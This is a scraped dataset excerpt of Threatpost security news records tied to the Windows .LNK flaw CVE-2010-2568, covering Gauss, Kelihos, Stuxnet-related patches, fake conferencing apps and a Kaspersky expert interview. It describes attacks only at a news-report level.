would you comment on this?******\n\n**Alex Gostev**: It\u2019s been quite a while since it was incorporated, and quite a while since it\u2019s been \u201ctaking away business\u201d. The thing is, it never did in fact take any business. The simple fact is that in order to develop successful security solutions, a company needs to specialize in developing those solutions. That must be their core business. That cannot be said of Microsoft.\n\n**My friends say Kaspersky Anti-Virus is a resource-hungry monster, and recommend that I use free antivirus solutions (I won\u2019t advertise them here). Their argument is: free antivirus is no worse, in fact they are better in many respects. Is this correct?******\n\n**Alex Gostev**: No, and I can\u2019t be bothered disproving it here. I personally would never use a free antivirus, even if I didn\u2019t work for Kaspersky Lab. I know how this type of software works, who works on these programs and how.\n\n**Which antivirus manufacturers do you feel most envious of? Would you agree to work for them if they paid you enough?**\n\n**Alex Gostev**: Well, I\u2019m not envious of anyone. There are companies that I have respect for \u2013 these are primarily the companies that can make good use of the resources they have, both human and technical, where the work of the specialists makes me say: \u201cHow the hell did they find this before us or do a better job of analyzing than us!\u201d This really stimulates competition, and, as a consequence, our level of expertise improves as well.\n\nIn recent times, I\u2019ve only seen this sort of interesting, motivating competition between us and Symantec. To be more precise, between Kaspersky\u2019s team of experts (GReAT) and their STAR team. That said, we cooperate very closely with them on a number of research topics, and have good personal relationships with them.\n\nAs for working for a different antivirus company \u2013 well, I think I\u2019ve become too much of a Kaspersky man. I\u2019d be more likely to change the IT security sphere for a different, but related area. Or set up my own business.\n\n**How do you attract clever students and specialists to your company? Is there a chance they will later be recruited by secret services (foreign or Russian)? Or is this the first time you\u2019ve heard about this?**\n\n**Alex Gostev**: How we attract new employees is a business secret J As for being recruited by secret services, I didn\u2019t in fact understand that one. Secret services can recruit anyone \u2013 taxi drivers, bakers, managers (ourselves not excluded), so what? Kaspersky Lab has its own security service, and its does a great job. This question is within their competence.\n\n**When I was reverse engineering one of your products, namely Kaspersky CRYSTAL v12.0.1.288, I discovered the following comment:**\n\n**//I am not responsible for this code**\n\n**//I was forced to write it against my will**\n\n**This is an Easter egg, right?**\n\n**Alex Gostev**: When programs get complied, the comments existing in the source code do not enter the final code \u2013 every programmer knows this. So you could not have obtained that by reverse engineering.\n\nRead about the prehistory of that case: <http://stackoverflow.com/a/216744>\n\n****\n\n**Is a hardware firewall in the router enough? Or maybe, besides that, it\u2019s good to have a software firewall?**\n\n**Alex Gostev**: The firewalls in modern routers are pretty limited in terms of their functionality, and perform primitive filtering at the level of port addresses. Naturally, this solution is not adequate for complete security.\n\n**I want to ask about security in Linux. How does Kaspersky Lab approach this system from a security aspect? Do you study the number and geography of threats for Linux. Do such threats evolve in any way, and are they really dangerous? Linux users are convinced that they are secure, and malware does not pose any threat to them. You can read tons of comments like \u201cI\u2019ve got Linux, I\u2019m secure\u201d. What do you think about this?**\n\n**Alex Gostev**: There are far fewer attacks against Linux than Windows or even OS X, for that matter. The user base isn\u2019t as large as Windows and so the target isn\u2019t as attractive for attackers. There are vulnerabilities and other threats for Linux systems and have been since the beginning, but malware isn\u2019t a major issue on Linux.\n\n**Recently, I read that Android is the most unsafe mobile operating system. Do you agree? Which mobile OS is, in your opinion, the most secure?**\n\n**Alex Gostev**: Yes, I agree that Android is the most vulnerable mobile platform. The safest is iOS.\n\n**Stuxnet, Duqu, Flame and the latest Gauss have infected millions of computers, spying on their activities without the user realizing it. How is it possible that, despite the improvements antivirus products constantly make in detecting and blocking malware based on the behavior of executable files, Stuxnet and co. have not been noticed and detected? For example the spread via USB flash drive by autorun.inf using the CVE-2010-2568 vulnerability in the *.LNK file, or sending data to a remote server \u2013 how is this possible? What does Kaspersky Lab plan to do to fight cyber-espionage? What will be the next Gauss?**\n\n**Alex Gostev**: First of all, the Duqu, Flame and Gauss incidents do not involve millions of computers \u2013 at most they affected thousands. In fact, Duqu and miniFlame only affected a few dozen computers. Second, we\u2019re talking about programs that cost millions and that had input from dozens of people. These are not typical cyber threats \u2013 they are cutting-edge, complex threats. Obviously, learning how to reliably detect and block them takes time. It should be noted here that KL was the first company to detect and carry out in-depth analysis of them. We are the best in the world at detecting these sorts of threats \u2013 and that\u2019s a fact. We\u2019ll use the knowledge we\u2019ve gained to seek out other similar threats. \n\n**Why does Kaspersky slow my PC down so much?**\n\n**Alex Gostev**: A good level of protection will always require some use of computer resources. There are software products out there that call themselves antivirus solutions and which operate faster than our product, but the level of protection they provide is nowhere near that offered by Kaspersky Lab. We don\u2019t see the point of lowering the level of protection, because just one missed virus out of millions detected can cause a user major problems. We are constantly working on new technologies that will allow us to depart from older protection methods, such as the multi-level scanning of files. These technologies will use less computer resources, but also ensure the highest level of protection is maintained.\n\n**What is the role of Cloud Protection in Kaspersky\u2019s 2012 product versions? ****What are the pros besides the basic protection?**\n\n**Alex Gostev**: The reaction time of the cloud to new threats is generally several times greater than that offered by traditional signature databases. Cloud protection is intended primarily to prevent the user being affected by the very latest threats.\n\n**Your antivirus is useful against viruses and Trojans whose signatures are already known and the code is already recognized as malicious. ****What about \u201chand made\u201d viruses with hidden code? **\n\n**Alex Gostev**: Signature-based analysis is a tried-and-tested method of detecting threats, but on its own against today\u2019s threats it\u2019s virtually useless. That\u2019s why our product uses behavioral analyzers capable of determining whether a program is behaving itself or not. \n\n**When installing Kaspersky Anti-Virus together with another antivirus solution, why does Kaspersky tell you to remove them, but they don\u2019t say anything about Kaspersky? I found this rather strange.**\n\n**Alex Gostev**: To ensure a high level of protection and avoid any conflict with other programs, we recommend users uninstall all other antivirus products before installing our product. It is technically possible to have two or three antivirus solutions on one machine, but it will mean the computer is overloaded and will slow it down considerably. \n\n**Why don\u2019t you contact rutracker.org and tell them to stop distributing your products?**\n\n**Alex Gostev**: Let them carry on \u2013 we don\u2019t mind J\n\n**Is Kaspersky Mobile Security good enough to protect my Android phone? Also, why are there different prices for KMS on Google Play and on kaspersky.com sites? **\n\n**Alex Gostev**: Kaspersky Mobile Security is one of the best mobile AVs (and this is not just our opinion, PPCSL, AV-Test and other independent test agencies say the same). So, in answer to your first question, yes, it is. There are some differences between the update speeds on the GPlay and Kaspersky Lab websites and the tech support terms are also different (on GPlay you can get only limited support via email).\n\n**When will a control plug-in for browsers be implemented in KAV or KIS?**\n\n**Alex Gostev**: Is it really necessary? It\u2019s much easier and more effective to open the product and make all the necessary changes there. If you\u2019re talking about tuning the product settings, it is more effective to make all the necessary changes there. Also, we need to isolate our UI settings from malware and other processes to ensure the protection level.\n\n**Today we download loads of free apps to our gadgets. Can the attacker take advantage and disguise them as Trojans to compromise our systems and break into other remote targets?**\n\n**Alex Gostev**: There are indeed lots of [Android Trojans](<https://threatpost.com/android-trojan-apps-build-sms-botnet-121812/>) spreading not only in the guise of legitimate apps but also embedded by malicious users in popular programs. To do this they create their own modifications of the original app package where the Trojan module is added.\n\nHere are some recent examples of this:\n\n * http://www.msnbc.msn.com/id/48150203/ns/technology_and_science-security/t/fake-android-game-apps-sneak-malware-google-play/#.UMb3QYNnjgg\n * http://thenextweb.com/google/2012/10/05/over-60-percent-of-android-malware-comes-from-one-family-hides-in-fake-versions-of-popular-apps/\n\nand it\u2019s also worth reading [our report on mobile malware in 2012](<http://www.securelist.com/en/analysis/204792255/Kaspersky_Security_Bulletin_2012_The_overall_statistics_for_2012#1>).\n", "modified": "2013-04-17T16:31:03", "published": "2012-12-24T16:50:29", "id": "THREATPOST:177DA099F0CCEE2A79F823573B22840A", "href": "https://threatpost.com/interview-kaspersky-chief-malware-expert-alex-gostev-122412/77341/", "type": "threatpost", "title": "Interview with Kaspersky Chief Malware Expert Alex Gostev", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:28", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568"], "description": "[](<https://threatpost.com/new-gauss-malware-descended-flame-and-stuxnet-found-thousands-pcs-middle-east-080912/>)A new piece of malware dubbed Gauss, that experts say is a direct descendant of Flame and also related to Stuxnet and Duqu, has been found on thousands of PCs in the Middle East, mostly in Lebanon. Gauss contains some of the same code as Flame, but is markedly different in a number of respects, specifically in its ability to steal online banking credentials and has an encrypted payload that experts haven\u2019t yet been able to crack. Researchers say that Gauss is almost certainly the work of the same team that wrote the [Flame malware](<https://threatpost.com/diving-flame-researchers-find-link-stuxnet-061112/>), which they speculate is a state-sponsored group.\n\nGauss is built on the same platform as Flame and has some of the same attributes, including the ability infect USB sticks connected to compromised machines. Researchers discovered the Gauss infections earlier this year during the investigation into the Flame attacks and estimate that there are about 2,500 infections so far. While looking at the various modules of Flame, researchers found one that didn\u2019t quite match up with the rest of the tool and began looking into it further. What they found was a series of other modules, similar to Flame, some of which were already detected by antimalware products, and others that were not.\n\nGauss, like Flame, has a modular architecture and contains a number of pieces that perform discrete tasks. The tool is capable of stealing browser cookies and passwords, steal account information for social networks and IM applications, intercept online banking credentials for a handful of Middle Eastern banks as well as PayPal and Citibank and infect USB drives with a data-stealing module. When a clean USB thumb drive is connected to a Gauss-infected PC, the malware will copy itself to the USB drive. Then, when the drive is connected to a clean PC, the Gauss malware will run from the USB drive and collect whatever data it can from the new machine, which then is retrieved from the drive when it\u2019s inserted into a Gauss-infected computer. \n\nThis complex routine led researchers to speculate that Gauss may have been designed to infiltrate a specific kind of network.\n\n\u201cIt may have been built with an air-gapped network in mind,\u201d said Roel Schouwenberg, a senior malware researcher at Kaspersky Lab, which discovered Gauss and assisted in the investigation into Flame earlier this year.\n\nAir gaps are physical separations of machines on a network, often used in military and other sensitive environments as a way to keep machines housing classified data isolated or to prevent attackers from moving from one machine to another.\n\nGauss has a lot of similarities to its malicious predecessors, and researchers are confident that it is the handiwork of the same group that wrote Flame at a minimum, and likely Duqu and Stuxnet as well.\n\n\u201cBased on our analysis and the timestamps from the collected malware modules, we believe the Gauss operation started sometime around August-September 2011. This is particularly interesting because around September 2011, the CrySyS Lab in Hungary announced the discovery of Duqu. We do not know if the people behind Duqu switched to Gauss at that time but we are quite sure they are related: Gauss is related to Flame, Flame is related to Stuxnet, Stuxnet is related to Duqu. Hence, Gauss is related to Duqu,\u201d Kaspersky Lab researchers said in a statement on the new malware. \n\nRight now, the malware\u2019s infrastructure is dormant and researchers said that the command-and-control system for the malware went offline last month. There are five C&amp;C servers that were in use during the time that Gauss was active, and they were separate from the much larger C&amp;C system used by Flame.[](<http://master-ke.kaspersky-labs.com:9088/images/pictures/klblog/208193774.png>)\n\nNamed after the German mathematician Carl Friedrich Gauss, the new malware, like Flame, Duqu and Stuxnet before it, is somewhat of a mystery at the moment, in a number of respects. Researchers are not sure how the malware spreads or infects machines, although it does have a the same capability to infect USB sticks and exploits the same LNK vulnerability that both Stuxnet and Flame did. That turned out to be just one of the methods that Stuxnet used to compromise a new machine, and there may well be others yet to be discovered in Gauss, as well. It does not look as though Gauss uses any zero day vulnerabilities to infect PCs, but researchers are still unsure how the malware initially infects a new machine.\n\n\u201cIt\u2019s important to mention that Gauss infects USB sticks with a data stealing component that takes advantage of the same .LNK (CVE-2010-2568) vulnerability exploited by Stuxnet and Flame. At the same time, the process of infecting USB sticks is more intelligent and efficient. Gauss is capable of \u2018disinfecting\u2019 the drive under certain circumstances, and uses the removable media to store collected information in a hidden file. The ability to collect information in a hidden file on USB drives exists in Flame as well. Another interesting component of Gauss is the installation of a custom font called Palida Narrow. The purpose of this font installation is currently unknown,\u201d Kaspersky\u2019s researchers said.\n\nThe payload that Gauss delivers also is a mystery. The main payload is encrypted using a key that\u2019s derived from a series of variables taken from the system it\u2019s on and researchers haven\u2019t been able to decrypt the file at this point. Aside from the data-stealing and banker Trojan functionality that\u2019s already known, there could be other hidden functionality in Gauss that haven\u2019t yet come to light.\n\n\u201cGauss is much more multi-faceted I would say than Stuxnet, which had one particular goal,\u201d Schouwenberg said. \u201cThis is more about surveillance than espionage. We don\u2019t necessarily think they\u2019re trying to steal any money, but maye just monitor what\u2019s happening in these accounts.\u201d \n\nOne of the other interesting aspects of Gauss\u2019s discovery is its geographic distribution. The huge majority of the infected machines\u20131,660 of them\u2013are located in Lebanon. Other Middle Eastern countries, including Israel and Palestine, also show infections, but not nearly as many as Lebanon.\n\nGauss is the latest in what has become an ever-expanding group of attack tools that researchers have classified as cyberweapons, or malware specifically designed by governments or government-sponsored groups to target foreign governments. [Stuxnet](<https://threatpost.com/stuxnet-authors-made-several-basic-errors-011811/>) was the first and most famous of these and was written specifically to compromise the machines running an Iranian nuclear facility. Next came [Duqu](<https://threatpost.com/anatomy-duqu-attacks-112111/>), a similar tool with a broader target base that researchers said was closely related to Stuxnet and likely produced by the same team. When Flame appeared earlier this year, it signaled a change in the landscape, as researchers found that the malware used a novel spreading technique that involved using a forged Microsoft digital certificate in order to impersonate a Windows Update server.\n\nNow comes Gauss, the latest member of the Stuxnet-Duqu-Flame family tree, armed with an encrypted payload and an odd proclivity to steal online banking credentials. That\u2019s aberrant behavior for a tool allegedly designed by a government, but as the payload, and therefore the malware\u2019s ultimate goal, are unknown at this point, the financial component to Gauss may become clear as time goes on.\n\n\u201cThey really went to a lot of trouble to make it hard to break the crypto on Gauss. We\u2019re keeping in mind the possibility of a destructive payload for ICS or SCADA systems,\u201d Schouwenberg said. \u201cMaybe it\u2019s a side effect of the encrypted payload that no one will be able to copy and paste the code like they could with Stuxnet. Maybe they tried to learn some lessons from Stuxnet.\u201d\n", "modified": "2013-04-17T16:31:44", "published": "2012-08-09T13:31:45", "id": "THREATPOST:FD55FE2A305AB024AFF39336C3AA9731", "href": "https://threatpost.com/new-gauss-malware-descended-flame-and-stuxnet-found-thousands-pcs-middle-east-080912/76892/", "type": "threatpost", "title": "New Gauss Malware, Descended From Flame and Stuxnet, Found On Thousands of PCs in Middle East", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:23", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568"], "description": "Microsoft\u2019s Security Intelligence Report painted a bleak picture when it comes to malware, fraudulent login attempts and the staying power of really old exploits. Key findings in the 198-page biannual report run the gamut illustrating [how old threats die hard](<http://download.microsoft.com/download/E/8/B/E8B5CEE5-9FF6-4419-B7BF-698D2604E2B2/Microsoft_Security_Intelligence_Report_Volume_20_English.pdf>) and what new threats are on the horizon.\n\nThe report, released Thursday, analyzes the threat landscape of exploits, vulnerabilities, and malware using data for the third and fourth quarters of 2015. Data is culled from its own internet services and more than 600 million computers worldwide running services such as Windows Defender and the Microsoft Malicious Software Removal Tool.\n\nCertainly, there were plenty of bright spots in the report, especially if you lived in North America where, according to Microsoft, we are one of the least likely to become infected compared to other parts of the world. Another bright spot overall, while exploits and malware attacks are on the rise the number of times attackers successfully infect are declining.\n\nBut the \u201ctoo long: didn\u2019t read\u201d takeaway is simple for Microsoft\u2019s SIR. \u201cThreats don\u2019t change as fast as we think they do. Many of the issues we are faced with today are the same as they have been for years,\u201d said Dan Guido a security expert and founder of Trail of Bits. \u201cMany of the exploits and malware out there only affect older systems, and Microsoft has done a great job at designing Windows 10 and other, current generation, software to avoid them entirely. One of the easiest ways you can remove yourself from harm\u2019s way is to buy a new computer and get rid of an older one.\u201d\n\n**Vulnerabilities**\n\nThe longer version, Microsoft observed a rise in vulnerability disclosures of 9.4 percent in the second half of 2015 compared to the previous six months. Fifty percent of those vulnerabilities were considered medium risk by Microsoft. Disclosures of high-severity vulnerabilities increased 41.7 percent across the industry in the second half of 2015, accounting for 41.8 percent of all vulnerabilities.\n\nAttack vectors for those vulnerabilities were most likely third-party Windows applications followed by the core operating system, then OS applications and web browsers, according to Microsoft.\n\n**Exploit Kits**\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/05/06235818/Microsoft_SIR_2016_exploits.jpg>)\n\nQuarterly trends for the top 10 malware and unwanted software families detected on domain-joined computers in 2H15, by percentage of computers encountering each family.\n\nAfter decreasing steadily for more than a year, encounters with exploit kits increased by more than a third from the third quarter of 2015 compared fourth, according to Microsoft. Exploit kits remained the most commonly encountered type of exploit in the second half of the year, with an encounter rate more than four times that of the next most common type of exploit, according Microsoft.\n\nThe most predominant exploit kit was Angler, and the most targeted operating system flaw was CVE-2010-2568, a vulnerability in Windows Shell. CVE-2010-2568, a vulnerability well known for its usage in the Stuxnet malware family in June 2010, has had a patch available since Aug. 2, 2010 but many systems are still being successfully targeted.\n\n\u201cRecently, the industry has seen a rise on attacks exploiting 10-year-old vulnerabilities to gain access and encrypt systems. The question is, why haven\u2019t these old vulnerabilities been fixed yet?\u201d said Gavin Millard, EMEA Technical Director for Tenable Network Security. \u201cIt\u2019s critically important that organizations don\u2019t forget to patch the long forgotten vulnerabilities still lingering that can be easily exploited,\u201d he said.\n\n**Malware on the Move**\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/05/06235821/Microsoft_SIR_2016_malware2.jpg>)\n\nTop categories of malware and unwanted software detected by Windows Defender and System Center Endpoint Protection at Microsoft in 2H15\n\nAs for malware, according Microsoft, the number of worldwide PC hit with attempted malware infection in the second half of 2015 shot up to 20 percent compared to the previous year, a 6 percent rise. Ransomware accounted for less than 0.5 percent of malware that attempted to infect Windows PCs. Ransomware, Microsoft reported, is being used by attackers more judiciously in targeted attacks.\n\nTwo new browser modifiers, Win32/Diplugem and Win32/SupTab, were primarily responsible for the increased encounter rate of malware for in the third quarter of 2015.\n\nOne interesting malware finding, PCs managed by IT are much less likely to encounter malware, with about 11 percent of domain-joined PCs encountering malware in the fourth quarter, compared to about 22 percent of non-domain-joined systems, according to Microsoft.\n\n**Password Attacks **\n\nMicrosoft tapped intelligence from Microsoft Accounts (Outlook.com, OneDrive and Skype) and also its Azure Active Directory (used for Office 365, Box and cloud apps) and measured how many times and how successful attackers were at compromising accounts via phishing, brute force, social engineering, and other types of attacks.\n\n\u201cFrom all this data gathering and analysis, each day Microsoft\u2019s account protection systems automatically detect and prevent more than 10 million attacks, from tens of thousands of locations, including millions of attacks where the attacker has valid credentials,\u201d according to Microsoft.\n\nMicrosoft reports its accounts have in excess of 13 billion logins per day, of which 10 million attempts are flagged as fraudulent.\n\n**Captain Obvious Recommendations **\n\nMicrosoft\u2019s recommended solutions won\u2019t surprise any seasoned security experts. Microsoft recommends:\n\n * Enterprise networks should consider blocking certain types of websites that don\u2019t serve the interest of the business.\n * Prepare your network to be forensically ready, so that you can achieve containment and recovery if a compromise occurs.\n * Make sure that your organization\u2019s internet-facing assets are always running up-to-date applications and security updates, and that they are regularly audited for suspicious files and activity.\n * Conduct enterprise software security awareness training, and build awareness of malware prevention.\n * Institute a strong network firewall and proxy.\n * Apply all security updates as soon as they become available.\n * Consider disabling features, such as EPS or macros, in powerful products like Microsoft Office by using Group Policy.\n * Enterprise networks should segregate high business impact data holding segments from internet-connected networks.\n", "modified": "2016-05-13T16:49:41", "published": "2016-05-07T09:52:06", "id": "THREATPOST:EE3B2C051F98B1FC8B031246AF4EBA62", "href": "https://threatpost.com/old-exploits-die-hard-says-microsoft-report/117918/", "type": "threatpost", "title": "Microsoft Security Intelligence Report: Top Takeaways", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-08T16:49:57", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568"], "description": "Popular conferencing apps have become a major cybercrime lure during the COVID-19 work-from-home era \u2013 and Skype is the undisputed leader when it comes to being impersonated by malicious downloads, researchers have found.\n\nAn April analysis from Kaspersky uncovered a total of 120,000 suspicious malware and adware packages in the wild masquerading as versions of the video calling app.\n\nIt should be said that Skype isn\u2019t alone in being targeted: The research found that among a total of 1,300 suspicious files not using the Skype name, 42 percent were disguised as Zoom, followed by WebEx (22 percent), GoToMeeting (13 percent), Flock (11 percent) and Slack (11 percent).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWith the rise of social distancing, Kaspersky experts investigated the threat landscape for social meeting applications to make sure users are safe and their communication experience is enjoyable,\u201d the firm said in an emailed analysis. \u201cSocial meeting applications currently provide easy ways for people to connect via video, audio or text when no other means of communication are available. However, cyber-fraudsters do not hesitate to use this fact and try to distribute various cyberthreats under the guise of popular apps.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/08110000/social-meeting-malware.png>)\n\nSome of the files found turned out to be simply knockoff versions of the real thing, but among the actual threats detected, a few malwares and file types came to the fore, including two [adware families](<https://threatpost.com/google-play-adware-30-million/144098/>): DealPly and DownloadSponsor.\n\n\u201cBoth families are installers that show ads or download adware modules,\u201d according to the analysis. \u201cSuch software typically appears on users\u2019 devices once they are downloaded from unofficial marketplaces.\u201d\n\nThere were also some malware threats disguised as .LNK files \u2013 shortcuts to applications \u2013 that Kaspersky detected as Exploit.Win32.CVE-2010-2568. This is \u201can old, yet still widespread malicious code that allows attackers to infect the target with additional malware,\u201d according to the firm. The old, patched [vulnerability it uses](<https://nvd.nist.gov/vuln/detail/CVE-2010-2568>) is a Windows Shell that is not properly handled during icon displays in Windows Explorer, which allows arbitrary code execution via specially crafted .LNK or .PIF shortcut files. It affects Windows XP, Vista and Windows 7, mostly.\n\nTrojans were also a popular malware type found in the fake apps, especially Skype, the firm found.\n\n\u201cIn the current landscape, when most of us are working from home, it is extremely important to make sure that what we use as a tool for online social meeting is downloaded from a legitimate source, set up properly and doesn\u2019t have severe unpatched vulnerabilities,\u201d said Denis Parinov, security expert at Kaspersky, via email.\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "modified": "2020-04-08T16:23:29", "published": "2020-04-08T16:23:29", "id": "THREATPOST:F3563336B135A1D7C1251AE54FDC6286", "href": "https://threatpost.com/skype-apps-hide-malware/154566/", "type": "threatpost", "title": "ThreatList: Skype-Themed Apps Hide a Raft of Malware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:01:46", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2010-2772"], "description": "There\u2019s a little Michael Myers in the Kelihos botnet; maim it, kill it and it keeps on coming back to wreak more havoc. The 2011 [takedown of the Kelihos botnet](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>) was one of Microsoft\u2019s high-profile success stories against spambots and the like, yet Kelihos was back for more at the start of 2012 using dynamic fast-flux techniques to avoid detection and further shutdowns.\n\nAs 2012 winds down, Kelihos is still going strong, now relying on double fast-flux domains to spread spam and malware. According to an analysis from a [researcher at abuse.ch](<http://www.abuse.ch/?p=4878>), Kelihos has also switched top-level domains, moving to .ru from .eu. More insidious, however, is that it now has the ability to spread via removable drives such as USB storage devices.\n\nOnce this latest update of Kelihos infects a computer, it connects with a .ru domain hosting its command and control looking for updates. The .ru domain is double fast-flux hosted, the researcher, who preferred to not be identified, said. Once an updated version of Kelihos is sent to the infected machine, it will infect any removable drives attached to the computer by exploiting the same vulnerability as Stuxnet. [CVE-2010-2568 is a Windows Shell vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>) that would give an attacker remote access via a malicious .LNK or .PIF shortcut file that is not properly handled by Windows Explorer during icon display. Malware exploiting this vulnerability and [CVE-2010-2772 in Siemens WinCC SCADA systems](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2772>) was found in July 2010.\n\nThe switch to .ru domains happened during the summer, according to the report, and the attackers have a lengthy list of sites from which to send new binaries updating the botnet, all of which are registered to REGGI-RU, a registrar in Russia. The botnet operators, however, are using a registrar in the Bahamas to register the name server domains providing DNS resolution to the Russian domains hosting malware, the site said.\n\n\u201cKelihos is not easy to shut down since it is using double FastFlux for their malware distribution domains and rely on P2P techniques for botnet communication. So there is no central botnet infrastructure,\u201d the researcher said. \u201cBy adding the possibility to spread via removable drives, Kelihos also has a very effective way to spread itself across networks and computers even without the need of a central (distribution) infrastructure. Last but not least, the infection binaries associated with Kelihos I\u2019ve seen so far have a very poor AV detection rate.\u201d\n\nKelihos boasts up to 150,000 spambots per day, the same level of activity as the Cutwail botnet, which was recently discovered to be spamming out the [Gameover variant of the Zeus Trojan](<https://threatpost.com/gameover-zeus-variant-sends-malicious-email-cutwail-botnet-120512/>).\n\nKelihos remains a prime example of how difficult it is to permanently disable and shut down a botnet that is this profitable. After September\u2019s takedown, in which Microsoft and researchers from Kaspersky Labs sinkholed the botnet\u2019s command and control, [Kelihos was back in business by January](<https://threatpost.com/kelihos-botnet-resurfaces-013112/>). Kaspersky researcher Tillmann Werner said the initial takedown would only be a temporary solution because for legal reasons the security companies could not push an update to the botnet that would disable it. Instead, the peer in the network that was sinkholed was no longer the dominant one, and others eventually began communicating with the compromised machines.\n", "modified": "2013-04-17T16:31:06", "published": "2012-12-11T14:28:33", "id": "THREATPOST:5202B8AD19491EC98E5A6D0691C3F16C", "href": "https://threatpost.com/kelihos-update-includes-new-tld-and-usb-infection-capabilities-121112/77299/", "type": "threatpost", "title": "Kelihos Update Includes New TLD and USB Infection Capabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:15", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2015-0096"], "description": "A five-year-old Microsoft patch for the .LNK vulnerability exploited by Stuxnet failed to properly protect Windows machines, leaving them exposed to exploits since 2010.\n\nMicrosoft today is expected to release a security bulletin, MS15-020, patching the vulnerability ([CVE-2015-0096](<https://bugs.launchpad.net/bugs/cve/2015-0096>)). It is unknown whether there have been public exploits of patched machines. The [original LNK patch](<https://technet.microsoft.com/library/security/ms10-046>) was released Aug. 2, 2010.\n\nThe [.LNK vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>) was part of Stuxnet\u2019s arsenal as it went after Iran\u2019s nuclear program with a barrage of exploits targeting Windows vulnerabilities, as well as shortcomings inside Siemens programmable logic controllers in charge of centrifuge operations inside the Natanz uranium enrichment facility.\n\nGerman researcher Michael Heerklotz in January reported the new findings to HP\u2019s Zero Day Initiative, which is expected to release full details today at 5 p.m. Eastern time.\n\n\u201cThat patch didn\u2019t completely address the .LNK issue in the Windows shell, and there were weaknesses left behind that have been resolved in this patch,\u201d said Brian Gorenc, manager of vulnerability research with ZDI. Gorenc said the vulnerability works on Windows machines going back to Windows XP through Windows 8.1, and the proof of concept exploit developed by Heerklotz and tweaked by ZDI evades the validation checks put in place by the original Microsoft security bulletin, CVE-2010-2568.\n\nLNK files define shortcuts to files or directories; Windows allows them to use custom icons from control panel files (.CPL). In Windows, ZDI said, those icons are loaded from modules, either executables or DLLs; CPLs are DLLs. An attacker is able to then define which executable module would be loaded, and use the .LNK file to execute arbitrary code inside of the Windows shell.\n\n\u201cWhat makes this vulnerability so attractive is the history behind its attack surface, and the ability to load arbitrary DLLs to execute code,\u201d Gorenc said. \u201cFrom an attacker\u2019s perspective, if they can get a user to view a folder with a malicious LNK stored inside, they will be able to execute arbitrary code. It\u2019s an easy attack surface for them to hit.\u201d\n\nThe exploit code is fairly easy to generate, Gorenc said, and does not require bypassing any of the memory mitigations put in place by Microsoft in its operating system.\n\nGorenc would not say whether the vulnerability had been exploited in the wild, but did point out that a Metasploit module has been available since 2010 and has been used in countless pen-tests.\n\nThe timing of this announcement coincides with new research coming out of last month\u2019s Kaspersky Security Analyst Summit, during which the [Equation APT group](<https://threatpost.com/massive-decades-long-cyberespionage-framework-uncovered/111080>) was uncovered. The group has been linked to Stuxnet, Flame and other advanced attack platforms, and made use of the same .LNK vulnerability.\n\nThe most direct connection was found in the Fanny worm that is part of the Equation malware toolkit and pre-dates Stuxnet. The worm exploits two zero day vulnerabilities later used by Stuxnet, including the [.LNK exploit](<https://threatpost.com/massive-decades-long-cyberespionage-framework-uncovered/111080>). Fanny was used to infect air-gapped machines inside of sensitive installations, moving between infected systems via USB removable storage drives.\n\nWhen a USB stick is infected, the Fanny worm creates a hidden storage partition on the drive. When the infected stick is plugged into an air-gapped machine that is not online, it maps that computer\u2019s system information. If the stick is later plugged into a machine that is connected to the Internet, the stolen data is sent to the attackers. The attackers can then save commands to the hidden partition, and if the stick is plugged back in to the air-gapped machine, Fanny will recognize the commands and run them.\n\n\u201cThis effectively allowed the Equation group to run commands inside air-gapped networks thorugh the use of infected USB sticks, as well as map the network infrastructure of such networks,\u201d said a report written by Kaspersky Lab.\n", "modified": "2015-03-13T19:53:51", "published": "2015-03-10T13:00:57", "id": "THREATPOST:13BF380EC94838E00D8D4BD43095E77A", "href": "https://threatpost.com/patched-windows-machines-exposed-to-stuxnet-lnk-flaw-all-along/111558/", "type": "threatpost", "title": "Patched Windows Machines Exposed to Stuxnet LNK Flaw All Along", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:48", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", 